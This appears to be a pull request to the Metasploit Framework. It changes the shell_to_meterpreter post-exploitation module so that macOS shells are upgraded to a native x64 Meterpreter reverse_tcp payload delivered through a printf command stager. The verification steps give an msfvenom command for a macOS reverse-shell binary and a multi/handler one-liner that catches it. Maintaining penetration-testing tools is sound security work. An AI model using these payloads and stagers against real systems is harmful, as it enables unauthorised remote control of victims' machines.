### PR TITLE
upgrade osx shells to osx meterpreter

### DIFF
--- a/modules/post/multi/manage/shell_to_meterpreter.rb
+++ b/modules/post/multi/manage/shell_to_meterpreter.rb
@@ -81,8 +81,10 @@ class MetasploitModule < Msf::Post
       psh_arch = 'x86'
       vprint_status("Platform: Windows")
     when 'osx'
-      platform = 'python'
-      payload_name = 'python/meterpreter/reverse_tcp'
+      platform = 'osx'
+      payload_name = 'osx/x64/meterpreter/reverse_tcp'
+      lplat = [Msf::Platform::OSX]
+      larch = [ARCH_X64]
       vprint_status("Platform: OS X")
     when 'solaris'
       platform = 'python'
@@ -99,8 +101,10 @@ class MetasploitModule < Msf::Post
         larch = [ARCH_X86]
         vprint_status("Platform: Linux")
       elsif target_info =~ /darwin/i
-        platform = 'python'
-        payload_name = 'python/meterpreter/reverse_tcp'
+        platform = 'osx'
+        payload_name = 'osx/x64/meterpreter/reverse_tcp'
+        lplat = [Msf::Platform::OSX]
+        larch = [ARCH_X64]
         vprint_status("Platform: OS X")
       elsif cmd_exec('python -V 2>&1') =~ /Python (2|3)\.(\d)/
         # Generic fallback for OSX, Solaris, Linux/ARM
@@ -162,7 +166,7 @@ class MetasploitModule < Msf::Post
           print_error('Powershell is not installed on the target.') if datastore['WIN_TRANSFER'] == 'POWERSHELL'
           vprint_status("Transfer method: VBS [fallback]")
           exe = Msf::Util::EXE.to_executable(framework, larch, lplat, payload_data)
-          aborted = transmit_payload(exe)
+          aborted = transmit_payload(exe, platform)
         end
       end
     when 'python'
@@ -171,7 +175,7 @@ class MetasploitModule < Msf::Post
     else
       vprint_status("Transfer method: Bourne shell [fallback]")
       exe = Msf::Util::EXE.to_executable(framework, larch, lplat, payload_data)
-      aborted = transmit_payload(exe)
+      aborted = transmit_payload(exe, platform)
     end
 
     if datastore['HANDLER']
@@ -181,7 +185,7 @@ class MetasploitModule < Msf::Post
     return nil
   end
 
-  def transmit_payload(exe)
+  def transmit_payload(exe, platform)
     #
     # Generate the stager command array
     #
@@ -193,16 +197,18 @@ class MetasploitModule < Msf::Post
       :linemax => linemax,
       #:nodelete => true # keep temp files (for debugging)
     }
-    if session.platform == 'windows'
+    case platform
+    when 'windows'
       opts[:decoder] = File.join(Rex::Exploitation::DATA_DIR, "exploits", "cmdstager", 'vbs_b64')
       cmdstager = Rex::Exploitation::CmdStagerVBS.new(exe)
+    when 'osx'
+      opts[:background] = true
+      cmdstager = Rex::Exploitation::CmdStagerPrintf.new(exe)
     else
       opts[:background] = true
       opts[:temp] = datastore['BOURNE_PATH']
       opts[:file] = datastore['BOURNE_FILE']
       cmdstager = Rex::Exploitation::CmdStagerBourne.new(exe)
-      # Note: if a OS X binary payload is added in the future, use CmdStagerPrintf
-      #       as /bin/sh on OS X doesn't support the -n option on echo
     end
 
     cmds = cmdstager.generate(opts)


### PR DESCRIPTION
Fix shell_to_meterpreter to support the native OSX stager.

## Verification

List the steps needed to make sure this thing works


- [x] Land https://github.com/rapid7/rex-exploitation/pull/14 and include the gem
- [x] Get a shell or meterpreter session on OSX e.g:
```
 msfvenom -p osx/x64/shell_reverse_tcp LHOST=$LHOST LPORT=4444 -f macho -o shell.macho
 msfconsole -qx "use exploit/multi/handler; set payload osx/x64/shell_reverse_tcp; set lhost $LHOST; set lport 4444; set ExitOnSession false; run -j"
```
- [x] `sessions -u 1`
- [ ] ...
- [x] **Verify** you get a meterpreter session

